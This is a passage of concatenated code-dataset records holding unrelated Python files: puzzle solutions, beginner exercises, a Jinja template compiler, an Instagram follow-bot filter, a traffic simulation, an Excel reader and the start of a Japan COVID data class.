new_name = os.path.join(\n path, 数据['id'][num]+\" \"+标题+'[ favorite ]'+file_dict['后缀'][num])\n else:\n new_name = os.path.join(\n path, 数据['id'][num]+\" \"+标题+file_dict['后缀'][num])\n except TypeError:\n with open(os.path.join(url, '下载失败.txt'), \"a\", encoding='utf-8', errors='ignore') as a: # 打开文件\n a.writelines(f\"下载失败:{数据['id'][num]}\\n\")\n a.close()\n try:\n os.rename(old_name, new_name)\n except FileNotFoundError:\n print(\"[WinError 2] 系统找不到指定的文件。\")\n except FileExistsError:\n new_name = os.path.join(\n path, 数据['id'][num]+\" \"+标题+file_dict['后缀'][num])\n os.rename(old_name, new_name)\n\n\n num += 1\n print(f'格式化前:{old_name}')\n print(f'格式化后:{new_name}')\n print(f'进度{num}/{数据[\"num\"]}')\n print()\n print()\n\n\n# 格式化本地(r'D:\\python')\n","sub_path":"python/自动化整理番号封面/rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"19901874","text":"from collections import defaultdict,deque\nclass Solution:\n def minReorder(self, n: int, edges: List[List[int]]) -> int:\n\n output = 0\n edge_set = set()\n visited = set()\n adj = defaultdict(list)\n adj_stk = [0]\n visited.add(0)\n\n for edge in edges:\n edge_set.add(tuple(edge))\n adj[edge[0]].append(edge[1])\n adj[edge[1]].append(edge[0])\n\n while adj_stk!=[]:\n p =adj_stk.pop()\n for neigh in adj[p]:\n if neigh not in visited:\n if (p,neigh) in edge_set:\n output+=1\n visited.add(neigh)\n adj_stk.append(neigh)\n\n return output\n","sub_path":"leetcode_1466.py","file_name":"leetcode_1466.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"81349815","text":"#!/usr/bin/env python\n\"\"\"\nTests for database connections and actions\n\"\"\"\nfrom backend.query_database import query_database, fuzzy_query\nfrom backend.tests.base import BaseTestCase\n\n\nclass TestCitiesService(BaseTestCase):\n def test_get_city(self):\n \"\"\"Test passes if correct city is returned\"\"\"\n good_city = 'Des Moines'\n result = query_database(good_city)\n self.assertIsNotNone(result)\n\n def test_get_fuzzy_city(self):\n \"\"\"Test passes if result is not None\"\"\"\n good_city = 'Des Moines'\n result = fuzzy_query(good_city)\n self.assertIsNotNone(result)\n","sub_path":"backend/tests/test_cities.py","file_name":"test_cities.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"32823836","text":"# Given array of integers, find the maximal possible sum of some of its k consecutive elements.\n\n# + Example\n\n# - For inputArray = [2, 3, 5, 1, 6] and k = 2, the output should be\n# > arrayMaxConsecutiveSum(inputArray, k) = 8.\n# All possible sums of 2 consecutive elements are:\n# 2 + 3 = 5;\n# 3 + 5 = 8;\n# 5 + 1 = 6;\n# 1 + 6 = 7.\n# Thus, the answer is 8.\n\n# + Input/Output\n\n# - [execution time limit] 4 seconds (py3)\n# - [input] array.integer inputArray\n# Array of positive integers.\n# Guaranteed constraints:\n# 3 ≤ inputArray.length ≤ 105,\n# 1 ≤ inputArray[i] ≤ 1000.\n# - [input] integer k\n# An integer (not greater than the length of inputArray).\n# Guaranteed constraints:\n# 1 ≤ k ≤ inputArray.length.\n# - [output] integer\n# The maximal possible sum.\n\n# + Solution\n\n# - 7/7\n\n\ndef arrayMaxConsecutiveSum(arr, k):\n prev_sum = sum(arr[:k])\n max_sum = prev_sum\n\n for i in range(k, len(arr)):\n current_sum = prev_sum - arr[i - k] + arr[i]\n 
prev_sum = current_sum\n\n if current_sum > max_sum:\n max_sum = current_sum\n\n return max_sum\n\n\nprint(arrayMaxConsecutiveSum([2, 3, 5, 1, 6], 2))\n# > 8\n","sub_path":"code-fights/arcade/intro/8-diving-deeper/37-array-max-consecutive-sum.py","file_name":"37-array-max-consecutive-sum.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"134098238","text":"import os\nimport shutil\nimport glob\n\nfrom kubetemplate import utils, helpers\n\n__j = None # Jinja compiler\n\n''' command line compile wrapper. parses command line arguments and .kubetemplate file '''\n# def compile(input_t=None, output_t=None):\ndef compile(\n input_t : 'input target path, defaults to targets in .kubetemplate file' = None,\n output_t : 'output target path if input target path specified, defaults to same directory' = None,\n ):\n if input_t is not None:\n return compile_t(input_t, output_t)\n else: # default to .kubetemplate file\n for t in utils.props()['compiler']['targets']:\n to = t.get('to')\n to = to and utils.root_path(to)\n path = utils.root_path(t['path'])\n compile_t(path, to)\n\n'''\n compile a glob-able path input_t\n output directory ouput_t when input_t is a file or directory, undefined behaviour for glob-able input_t\n'''\ndef compile_t(\n input_t : 'input target path',\n output_t : 'output target path, defaults to same path' = None,\n ):\n\n input_t = os.path.abspath(input_t)\n output_t = output_t and os.path.abspath(output_t)\n\n for g in glob.glob(input_t):\n if os.path.isdir(g):\n for f in [\n os.path.join(di, fi)\n for (di, _, fis) in os.walk(g)\n for fi in fis\n ]:\n outd = output_t \\\n and os.path.join(\n output_t,\n os.path.relpath(f, g)\n ) \\\n or f\n outd = os.path.dirname(outd)\n compile_file(f, outd)\n else:\n outd = output_t or os.path.dirname(input_t)\n compile_file(g, outd)\n\n''' compiles a single file '''\ndef compile_file(input_f, output_d):\n\n global __j\n if __j is None:\n context = utils.props()\n\n context['helpers'] = helpers.helpers\n\n __j = JinjaCompiler('/', context)\n\n path, file_name = os.path.split(input_f)\n fname, ext = os.path.splitext(file_name)\n\n output_prefix = __j.env.globals['config'].get('compiler', {}).get('output_prefix', '')\n\n if ext == '.jinja':\n os.makedirs(output_d, exist_ok=True)\n output_f = os.path.join(output_d, '{}{}'.format(output_prefix, fname))\n\n print(input_f)\n\n __j.compile(input_f, output_f)\n\n return output_f\n\nclass JinjaCompiler:\n def __init__(self, root_dir, config):\n from jinja2 import Environment, FileSystemLoader\n self.env = Environment(loader=FileSystemLoader(root_dir))\n self.env.globals['config'] = config\n\n def compile(self, in_file, out_file, config={}):\n with open(out_file, 'w') as f:\n f.write(self.env.get_template(in_file).render(config))\n","sub_path":"kubetemplate/compile.py","file_name":"compile.py","file_ext":"py","file_size_in_byte":2823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"123865043","text":"import math\n\nclass Solution:\n def minimum(self, lst, key):\n cur_min = math.inf\n res = None\n for idx, elem in enumerate(lst):\n k = key(elem)\n if k < cur_min:\n cur_min = k\n res = elem\n return res\n\n def smallestSufficientTeam(self, req_skills, people):\n # base case for recursion\n if req_skills == []:\n return []\n for idx, person in enumerate(people):\n if set(person) == set(req_skills): # when a person have every required skills\n return 
[idx]\n else: # if there is no such superman :(\n possible_teams = []\n\n for idx, person in enumerate(people):\n if person == []:\n continue\n rec_ans = self.smallestSufficientTeam(\\\n [s for s in req_skills if s not in person],\n people[:idx] + people[idx+1:])\n for r_idx, p_idx in enumerate(rec_ans):\n if p_idx >= idx:\n rec_ans[r_idx] = p_idx + 1\n possible_teams.append([idx] + rec_ans)\n\n return self.minimum(possible_teams, key = len)\n\n\nreq_skills = [\"algorithms\",\"math\",\"java\",\"reactjs\",\"csharp\",\"aws\"]\npeople = [[\"algorithms\",\"math\",\"java\"],[\"algorithms\",\"math\",\"reactjs\"],[\"java\",\"csharp\",\"aws\"],[\"reactjs\",\"csharp\"],[\"csharp\",\"math\"],[\"aws\",\"java\"]]\n\nreq_skills = [\"gvp\",\"jgpzzicdvgxlfix\",\"kqcrfwerywbwi\",\"jzukdzrfgvdbrunw\",\"k\"]\npeople = [[],[],[],[],[\"jgpzzicdvgxlfix\"],[\"jgpzzicdvgxlfix\",\"k\"],[\"jgpzzicdvgxlfix\",\"kqcrfwerywbwi\"],[\"gvp\"],[\"jzukdzrfgvdbrunw\"],[\"gvp\",\"kqcrfwerywbwi\"]]\n\n\nreq_skills = [\"cdkpfwkhlfbps\",\"hnvepiymrmb\",\"cqrdrqty\",\"pxivftxovnpf\",\"uefdllzzmvpaicyl\",\"idsyvyl\"]\npeople = [[],[\"hnvepiymrmb\"],[\"uefdllzzmvpaicyl\"],[],[\"hnvepiymrmb\",\"cqrdrqty\"],[\"pxivftxovnpf\"],[\"hnvepiymrmb\",\"pxivftxovnpf\"],[\"hnvepiymrmb\"],[\"cdkpfwkhlfbps\"],[\"idsyvyl\"],[],[\"cdkpfwkhlfbps\",\"uefdllzzmvpaicyl\"],[\"cdkpfwkhlfbps\",\"uefdllzzmvpaicyl\"],[\"pxivftxovnpf\",\"uefdllzzmvpaicyl\"],[],[\"cqrdrqty\"],[],[\"cqrdrqty\",\"pxivftxovnpf\",\"idsyvyl\"],[\"hnvepiymrmb\",\"idsyvyl\"],[]]\ns = Solution()\n\n# print(s.minimum([1,2,3,4,1,2,3,1], key = lambda x:x%4))\nprint(s.smallestSufficientTeam(req_skills, people))\n# print(list(s.choose_l_items(list(range(10)), 2)))\n","sub_path":"Seungwoo/smallest_sufficient_team.py","file_name":"smallest_sufficient_team.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"16334346","text":"\"\"\"\n Filters\n\"\"\"\n\nimport os\nimport io\n\ndef check_user(self, user_id):\n user_id = self.convert_to_user_id(user_id)\n\n if not user_id:\n return False\n\n if self.whitelist and str(user_id) in self.whitelist:\n return True\n if self.blacklist and user_id in self.blacklist:\n return False\n\n if self.following == []:\n self.following = self.get_user_following(self.user_id)\n if user_id in self.following:\n return False\n\n user_info = self.get_user_info(user_id)\n if not user_info:\n return False # closed acc\n if \"is_business\" in user_info:\n if user_info[\"is_business\"]:\n return False\n if \"is_verified\" in user_info:\n if user_info[\"is_verified\"]:\n return False\n if \"follower_count\" in user_info and \"following_count\" in user_info:\n if user_info[\"follower_count\"] < self.min_followers_to_follow:\n return False\n if user_info[\"follower_count\"] > self.max_followers_to_follow:\n return False\n if user_info[\"following_count\"] < self.min_following_to_follow:\n return False\n if user_info[\"following_count\"] > self.max_following_to_follow:\n return False\n try:\n if user_info[\"follower_count\"] / user_info[\"following_count\"] \\\n > self.max_followers_to_following_ratio:\n return False\n if user_info[\"following_count\"] / user_info[\"follower_count\"] \\\n > self.max_following_to_followers_ratio:\n return False\n except ZeroDivisionError:\n return False\n\n if 'media_count' in user_info:\n if user_info[\"media_count\"] < self.min_media_count_to_follow:\n return False # bot or inactive user\n\n return True\n\ndef check_private(self, user_id):\n 
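\"\"\"Return True if the account is private; a missing user_id is treated as private.\"\"\"\n    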
if not user_id:\n return True\n\n user_info = self.get_user_info(user_id)\n if \"is_private\" in user_info:\n if user_info[\"is_private\"]:\n return True\n return False\n\ndef convert_to_user_id(self, smth):\n if type(smth) == str and not smth.isdigit():\n if smth[0] == \"@\": # cut first @\n smth = smth[1:]\n smth = self.get_userid_from_username(smth)\n # if type is not str than it is int so user_id passed\n return smth\n","sub_path":"followbot/bot/bot_filter.py","file_name":"bot_filter.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"313785892","text":"# 练习1:华氏温度转换为摄氏温度\n# 提示:华氏温度到摄氏温度的转换公式为:$C=(F - 32) \\div 1.8$\n\nimport math as m\nf = input(\"请输入华氏温度数字(仅可输入数字): \")\nf = float(f)\n\n\ndef f2c(f):\n c = (f - 32) / 1.8\n print(\"华氏温度 %.1f 度 转为摄氏度为 %.1f 度\\n\" % (f, c))\n return c\n\n\nf2c(f)\n\n# 练习2:输入圆的半径计算计算周长和面积\n\nr = input(\"请输入圆的半径: \")\nr = float(r)\n\n\ndef yuan(r):\n girth = m.pi * r * 2\n area = m.pi * r ** 2\n print(\"圆的周长为 %.2f ,圆面积为 %.2f \\n\" % (girth, area))\n\n\nyuan(r)\n\n# 练习3:输入年份判断是不是闰年\n\nwhile True:\n year = input(\"请输入年份(四位数字,仅可判断1900年至2999年): \")\n year = int(year)\n if year < 1900 or year > 2999:\n print(\"\\n输入错误,请重新输入\\n\")\n else:\n break\n\n\ndef yy(year):\n if year % 4 == 0:\n print(\"%d 年是闰年\" % year)\n else:\n print(\"%d 年不是闰年\" % year)\n\n\nyy(year)\n","sub_path":"1218/python100-day01-day15-2.py","file_name":"python100-day01-day15-2.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"243571005","text":"#!/usr/bin/env python\n# _*_ coding:utf-8 _*_\n__author__ = 'YinJia'\n\nimport xlrd\nimport openpyxl\n\nclass ReadExcel():\n \"\"\"读取excel文件数据\"\"\"\n def __init__(self,fileName, SheetName=\"Sheet1\"):\n self.data = openpyxl.load_workbook(fileName,data_only=True)\n self.table = self.data[SheetName]\n # self.data = xlrd.open_workbook(fileName)\n # self.table = self.data.sheet_by_name(SheetName)\n\n # 获取总行数、总列数\n self.nrows = self.table.max_row\n self.ncols = self.table.max_column\n def read_data(self):\n if self.nrows > 1:\n rows = list(self.table.rows)\n # 获取第一行的内容,列表格式\n keys = []\n # values = []\n listApiData = []\n for k in rows[0]:\n keys.append(k.value)\n # 获取每一行的内容,列表格式\n for row in rows[1:]:\n values = []\n for vrow in row:\n values.append(vrow.value)\n # keys,values组合转换为字典\n api_dict = dict(zip(keys, values))\n listApiData.append(api_dict)\n # print(listApiData)\n self.data.close()\n return listApiData\n else:\n print(\"表格是空数据!\")\n self.data.close()\n return None\n\nif __name__ == '__main__':\n fileName = 'C:\\\\Users\\yamei\\PycharmProjects\\DemoAPI\\database\\DemoAPITestCase.xlsx'\n re = ReadExcel(fileName)\n re.read_data()\n\n","sub_path":"lib/readexcel.py","file_name":"readexcel.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"431656638","text":"\"\"\"\ns18018 - Alexandre B A Villares\nhttps://abav.lugaralgum.com/sketch-a-day\n\nConverting some of Maeda's Design by Number\ndbnletters.dbn code -> Processing\n\"\"\"\n\ndbn_letter = {} # Dict of functions\n \ndef setup():\n parse_dbn_source(\"data/dbnletters.dbn\")\n size(500, 280)\n strokeCap(SQUARE)\n noSmooth()\n noLoop()\n\ndef draw():\n strokeCap(ROUND);\n dbn_sample()\n scale(3,3)\n translate(80,0)\n dbn_sample()\n \ndef dbn_sample():\n for y in range(0, 5):\n for x in range(1, 6):\n 
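# look up the letter function registered for this grid cell and draw it\n            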
dbn_letter[x + y * 5](x * 12, -20 - y * 12)\n dbn_letterZ(x * 12 + 12, -32 - y * 12)\n\ndef parse_dbn_source(file_path, color_mode = False):\n with open(file_path, \"r\") as f:\n dbn_source = f.readlines()\n inside_block = False\n command_name = \"\"\n command_block = []\n for ln in dbn_source:\n if ln.count(\"command\"):\n command_name = ln[14:15]\n elif ln.count(\"{\"):\n inside_block = True\n elif ln.count(\"}\"):\n if command_name in \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\":\n def_dbn_letter(command_block, command_name)\n command_block = [] # empty block\n inside_block = False\n elif inside_block:\n command_block.append(ln.lstrip())\n\n\ndef def_dbn_letter(dbn_block, func_key):\n p_block = []\n for dbn_line in dbn_block:\n if dbn_line:\n p_block.append(dbn_line\n .replace(\"line \", \"line(\")\n .replace(\" \", \",\")\n .replace(\"//\", \"#\")\n + \")\")\n # println(\"def dbn_letter\" + func_key)\n def func(h, v):\n with pushMatrix():\n scale(1, -1)\n for ln in p_block:\n # colorMode(HSB)\n # stroke(random(256), 200, 200)\n if ln[0] != \"#\":\n eval(ln)\n\n dbn_letter[func_key] = func\n dbn_letter[ord(func_key) - 64] = func\n globals()[\"dbn_letter\" + func_key] = func\n","sub_path":"parse_dbn_letters/parse_dbn_letters.pyde","file_name":"parse_dbn_letters.pyde","file_ext":"pyde","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"44958020","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 17 11:26:03 2021\n\n@author: axelb\n\"\"\"\n\n\nfrom lights import Traffic_light\nimport pycxsimulator\nfrom matplotlib.pylab import *\nimport matplotlib.cm as cm\nfrom car import Car\nfrom road import Road\nfrom lane import Lane\nfrom intersection_manager import IM, IM2\n\n\nwidth = 23\nheight = 38\n\nfree = 0 # maurdrit\ncarrying = 1 # maurdrit\n\ncarSpawnProb = 0.1 # chance of spawning car at any given tick\n\nstop = 0 # whether car is stop or go\ngo = 1 \n\nrd1Xpos = [10,10] # x values are the same as the road is straight\nrd1Ypos = [0,50] # y value from 0 to 50 as y = 0 on top, 50 on bottom\n\nred = 0 # color of light\ngreen = 1\n\nlightXpos = [10, 10, 40, 40] # x-position of ligth 1, 2, 3, 4 \nlightYpos = [10, 40, 10, 40] # y-position of light 1, 2, 3, 4\n\ndef initialize_2():\n global time, lightAgents, envir, cars\n \n \n time = 0\n road_1 = Road(0, 10, 10)\n car_1 = Car(0, 0)\n cars = []\n\n\ndef initialize():\n global time, lightAgents, envir, cars\n\n time = 0\n \n cars = [] # list of cars\n car = Car(10, 0) # create car object\n cars.append(car) # Spawn new car\n \n lightAgents = [] # list of lights\n for i in range(len(lightXpos)):\n new_light = Traffic_light(lightXpos[i], lightYpos[i]) #[lightXpos[i], lightYpos[i], red] # create light\n lightAgents.append(new_light) # spawn light\n \n # Kode som tegner veiene svart\n envir = zeros([height, width])\n envir[10,:] = 1\n envir[:,10] = 1\n envir[40,:] = 1\n envir[:,40] = 1\n \n \ndef initialize_elgeseter():\n global time, envir, lightAgents, cars, roads, total_traffic, IDIOT_IM, IDIOT_IM2\n time = 0\n cars = []\n lightAgents = []\n roads = []\n # Kode som tegner veiene svart\n envir = zeros([height, width])\n total_traffic = 0\n\n # RNGS\n \n rngs_lane_1 = Lane(7, 7, 0, 10, \"south\", envir)\n rngs_lane_2 = Lane(8, 8, 0, 10, \"south\", envir)\n rngs = [rngs_lane_1, rngs_lane_2]\n rngs_probs = [0.7, 0.3]\n road_north_going_south = Road(\"south\", rngs, rngs_probs, is_spawner=True)\n roads.append(road_north_going_south)\n\n traffic_light_rngs_s = Traffic_light(7, 11, 
group=1)\n lightAgents.append(traffic_light_rngs_s)\n rngs_lane_1.add_traffic_light('south', traffic_light_rngs_s)\n rngs_lane_2.add_traffic_light('south', traffic_light_rngs_s)\n\n traffic_light_rngs_e = Traffic_light(8, 11, group=2)\n lightAgents.append(traffic_light_rngs_e)\n rngs_lane_2.add_traffic_light('east', traffic_light_rngs_e)\n\n # RNGN\n\n rngn_lane = Lane(10, 10, 10, 0, \"north\", envir)\n rngn = [rngn_lane]\n rngn_probs = [1]\n road_north_going_north = Road(\"north\", rngn, rngn_probs, is_despawner=True)\n roads.append(road_north_going_north)\n\n # RMGN\n\n rmgn_lane_1 = Lane(10, 10, 24, 14, \"north\", envir)\n rmgn_lane_2 = Lane(11, 11, 24, 14, \"north\", envir)\n rmgn = [rmgn_lane_1 ,rmgn_lane_2]\n rmgn_probs = [0.5, 0.5]\n road_middle_going_north = Road(\"north\", rmgn, rmgn_probs)\n roads.append(road_middle_going_north)\n\n traffic_light_rmgn_n = Traffic_light(10, 13, group=1)\n lightAgents.append(traffic_light_rmgn_n)\n rmgn_lane_1.add_traffic_light('north', traffic_light_rmgn_n)\n rmgn_lane_2.add_traffic_light('north', traffic_light_rmgn_n)\n\n # RMGS\n\n rmgs_lane_2 = Lane(8, 8, 14, 24, \"south\", envir)\n rmgs_lane_1 = Lane(7, 7, 14, 24, \"south\", envir)\n rmgs = [rmgs_lane_1 ,rmgs_lane_2]\n rmgs_probs = [0.5, 0.5]\n road_middle_going_south = Road(\"south\", rmgs, rmgs_probs)\n roads.append(road_middle_going_south)\n\n traffic_light_rmgs_s = Traffic_light(7, 25, group=1)\n lightAgents.append(traffic_light_rmgs_s)\n rmgs_lane_1.add_traffic_light('south', traffic_light_rmgs_s)\n rmgs_lane_2.add_traffic_light('south', traffic_light_rmgs_s)\n\n # RNGW\n rngw_lane = Lane(22, 12, 11, 11, \"west\", envir)\n rngw = [rngw_lane]\n rngw_probs = [1]\n road_north_going_west = Road(\"west\", rngw, rngw_probs, is_spawner=True, avg_traffic=500)\n roads.append(road_north_going_west)\n\n rngw_lane.connect_road(road_north_going_north)\n traffic_light_rngw_n = Traffic_light(11, 11, group=2)\n lightAgents.append(traffic_light_rngw_n)\n rngw_lane.add_traffic_light('north', traffic_light_rngw_n)\n\n # RNGE\n rnge_lane = Lane(12, 22, 13, 13, \"east\", envir)\n rnge = [rnge_lane]\n rnge_probs = [1]\n road_north_going_east = Road(\"east\", rnge, rnge_probs, is_despawner=True, avg_traffic=200)\n roads.append(road_north_going_east)\n\n # RSGW\n rsgw_lane = Lane(22, 12, 25, 25, \"west\", envir)\n rsgw = [rsgw_lane]\n rsgw_probs = [1]\n road_south_going_west = Road(\"west\", rsgw, rsgw_probs, is_spawner=True, avg_traffic=500)\n roads.append(road_south_going_west)\n\n traffic_light_rsgw_s = Traffic_light(11, 25, group=2)\n lightAgents.append(traffic_light_rsgw_s)\n rsgw_lane.add_traffic_light('south', traffic_light_rsgw_s)\n\n # RSGE\n rsge_lane = Lane(12, 22, 27, 27, \"east\", envir)\n rsge = [rsge_lane]\n rsge_probs = [1]\n road_south_going_east = Road(\"east\", rsge, rsge_probs, is_despawner=True, avg_traffic=500)\n roads.append(road_south_going_east)\n \n # RSGS\n rsgs_lane_1 = Lane(7, 7, 28, 38, \"south\", envir)\n rsgs_lane_2 = Lane(8, 8, 28, 38, \"south\", envir)\n rsgs = [rsgs_lane_1, rsgs_lane_2]\n rsgs_probs = [0.5, 0.5]\n road_south_going_south = Road(\"south\", rsgs, rsgs_probs, is_despawner=True)\n roads.append(road_south_going_south)\n\n # RSGN\n rsgn_lane_1 = Lane(10, 10, 38, 28, \"north\", envir)\n rsgn_lane_2 = Lane(11, 11, 38, 28, \"north\", envir)\n rsgn = [rsgn_lane_1, rsgn_lane_2]\n rsgn_probs = [0.5, 0.5]\n road_south_going_north = Road(\"north\", rsgn, rsgn_probs, is_spawner=True)\n roads.append(road_south_going_north)\n \n traffic_light_rsgn_n = Traffic_light(10, 27, 
group=1)\n lightAgents.append(traffic_light_rsgn_n)\n rsgn_lane_1.add_traffic_light('north', traffic_light_rsgn_n)\n rsgn_lane_2.add_traffic_light('north', traffic_light_rsgn_n)\n rsgn_lane_2.add_traffic_light('east', traffic_light_rsgn_n)\n\n # Connecting lanes to roads\n rngs_lane_1.connect_road(road_middle_going_south)\n rngs_lane_2.connect_road(road_middle_going_south)\n rngs_lane_2.connect_road(road_north_going_east)\n \n rngw_lane.connect_road(road_north_going_north)\n \n rsgn_lane_1.connect_road(road_middle_going_north)\n rsgn_lane_2.connect_road(road_middle_going_north)\n rsgn_lane_2.connect_road(road_south_going_east)\n \n rsgw_lane.connect_road(road_south_going_south)\n\n rmgs_lane_1.connect_road(road_south_going_south)\n rmgs_lane_2.connect_road(road_south_going_south)\n\n rmgn_lane_1.connect_road(road_north_going_north)\n rmgn_lane_2.connect_road(road_north_going_north)\n\n IDIOT_IM = IM()\n IDIOT_IM.add_trafic_light(traffic_light_rngw_n)\n IDIOT_IM.add_trafic_light(traffic_light_rngs_s)\n IDIOT_IM.add_trafic_light(traffic_light_rngs_e)\n IDIOT_IM.add_trafic_light(traffic_light_rmgn_n)\n\n IDIOT_IM2 = IM()\n IDIOT_IM2.add_trafic_light(traffic_light_rmgs_s)\n IDIOT_IM2.add_trafic_light(traffic_light_rsgw_s)\n IDIOT_IM2.add_trafic_light(traffic_light_rsgn_n)\n\n\ndef observe():\n cla() # kanskje clearer drit\n imshow(envir, cmap = cm.Greys, vmin = 0, vmax = 1) # shows ilustration\n axis('image')\n xl = [ag.x for ag in lightAgents] # x-verdi for alle lyskryss\n yl = [ag.y for ag in lightAgents] # y-verdi for alle lyskryss\n sl = [ag.current_state for ag in lightAgents] # rødt eller grønt\n x1 = [car.x for car in cars] # x-verdi for alle biler\n y1 = [car.y for car in cars] # y-verdi for alle biler\n s1 = [car.go for car in cars] # stop or go\n scatter(xl, yl, c = sl, cmap = cm.RdYlGn) # tegner noe lyskryssdrit\n scatter(x1, y1, c = s1, cmap = cm.cool) # tegner noe bildrit\n \n title('Elgseter simulation using identical signals\\nt = ' + str(time)+ ' avg traffic = ' + str(int(total_traffic/(time+1)))) # D'Tittel da\n\n\ndef check_if_red_light(car):\n for light in lightAgents:\n xL_dist = abs(car.x - light.x)\n yL_dist = abs(car.y - light.y)\n if np.sqrt(xL_dist**2 + yL_dist**2) -1 == 0 and light.current_state == \"red\":\n return True\n return False\n\ndef get_distance_between_cars(car_1, car_2):\n y_distance = abs(car_1.y - car_2.y)\n x_distance = abs(car_1.x - car_2.x)\n distance = np.sqrt(y_distance**2 + x_distance**2) \n return distance\n\ndef update():\n global time, cars, roads, envir, total_traffic\n\n # Gitt av vi har en list over alle veiene\n for road in roads:\n popped_cars_list = road.trim_lane_ends()\n for popped_car in popped_cars_list:\n cars.remove(popped_car)\n new_car = road.spawn_car_cond()\n if new_car != False: # Hvis bil faktisk ble spawnet\n cars.append(new_car)\n \n for car in cars:\n car.update()\n\n IDIOT_IM.update(time)\n IDIOT_IM2.update(time)\n\n time += 1\n total_traffic += len(cars)\n \n\npycxsimulator.GUI().start(func=[initialize_elgeseter, observe, update])\n\n#PROBLEM I KODEN!:\n'''\nser ut til at når man nå kjører koden, fungerer det meste bra, MEN\nEtterhvert er det kun en og en (eller liten gruppe) bil som kan bevege seg, altså ikke alle\n'''\n","sub_path":"runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":9221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"591071515","text":"import sys, collections\n\ndirections = [[-1, 0], [1, 0], [0, 1], [0, -1]]\n\ndef read():\n 
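\"\"\"Read one line from stdin, stripped of trailing whitespace.\"\"\"\n    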
return sys.stdin.readline().rstrip()\n\ndef write(strThing):\n    sys.stdout.write(strThing)\n\ndef initMap():\n    dimensions = list(map(int, read().split(\" \")))\n    locations = [[] for x in range(dimensions[1])]\n\n    for thing in range(dimensions[1]):\n        row = read()\n        locations[thing] = list(row)\n\n    return locations\n\ndef findStart():\n    for i in range(len(room)):\n        for j in range(len(room[i])):\n            if room[i][j] == \"C\":\n                return [i, j]\n\ndef bfsPath(queue, room):\n    while len(queue) > 0:\n        location = queue.popleft()\n\n        if room[location[0]][location[1]] == \"W\":\n            return location[2]\n\n        room[location[0]][location[1]] = \"#\"\n\n        for direction in directions:\n            if ((location[0] + direction[0] < len(room) and location[0] + direction[0] >= 0) and\n                (location[1] + direction[1] < len(room[0]) and location[1] + direction[1] >= 0) and\n                room[location[0] + direction[0]][location[1] + direction[1]] != \"X\" and \n                room[location[0] + direction[0]][location[1] + direction[1]] != \"#\"):\n\n                queue.append([location[0] + direction[0], location[1] + direction[1], location[2] + 1])\n\noutputs = []\n\nfor testcase in range(int(read())):\n    paths = collections.deque()\n\n    room = initMap()\n    start = findStart()\n\n    paths.append([start[0], start[1], 0])\n    minJumps = bfsPath(paths, room)\n\n    output = \"#notworth\" if minJumps >= 60 else str(minJumps)\n    outputs.append(output)\n\nfor thing in outputs:\n    write(thing + \"\\n\")\n\n#suspended because of that stupid if condition\n#also I didn't check to see if an element is already in the queue\n#note to self: do that later","sub_path":"hs-problems/dmojdmopc13c1p4.py","file_name":"dmojdmopc13c1p4.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"17828078","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom pathlib import Path\nimport numpy as np\nimport pandas as pd\nfrom covsirphy.cleaning.country_data import CountryData\n\n\nclass JapanData(CountryData):\n    \"\"\"\n    Dataset of COVID-19 cases in Japan.\n\n    Args:\n        filename (str or pathlib.Path): CSV filename to save the raw dataset\n        force (bool): if True, always download the dataset from the server\n        verbose (int): level of verbosity\n\n    Notes:\n        Columns of JapanData.cleaned():\n            - Date (pandas.TimeStamp): date\n            - Country (str): 'Japan'\n            - Province (str): '-' (country level), 'Entering' or province names\n            - Confirmed (int): the number of confirmed cases\n            - Infected (int): the number of currently infected cases\n            - Fatal (int): the number of fatal cases\n            - Recovered (int): the number of recovered cases\n            - Tested (int): the number of tested persons\n            - Moderate (int): the number of cases that require hospitalization but are not severe\n            - Severe (int): the number of severe cases\n    \"\"\"\n    GITHUB_URL = \"https://raw.githubusercontent.com\"\n    URL_C = f\"{GITHUB_URL}/lisphilar/covid19-sir/master/data/japan/covid_jpn_total.csv\"\n    URL_P = f\"{GITHUB_URL}/lisphilar/covid19-sir/master/data/japan/covid_jpn_prefecture.csv\"\n    # Persons who were tested\n    TESTED = \"Tested\"\n    # Moderate: cases that require hospitalization but are not severe\n    MODERATE = \"Moderate\"\n    # Severe\n    SEVERE = \"Severe\"\n    # Column names\n    JAPAN_VALUE_COLS = [\n        CountryData.C, CountryData.CI, CountryData.F, CountryData.R,\n        TESTED, MODERATE, SEVERE,\n    ]\n    JAPAN_COLS = [\n        CountryData.DATE, CountryData.COUNTRY, CountryData.PROVINCE,\n        *JAPAN_VALUE_COLS,\n    ]\n\n    def __init__(self, filename, force=False, verbose=1):\n        Path(filename).parent.mkdir(exist_ok=True, parents=True)\n        
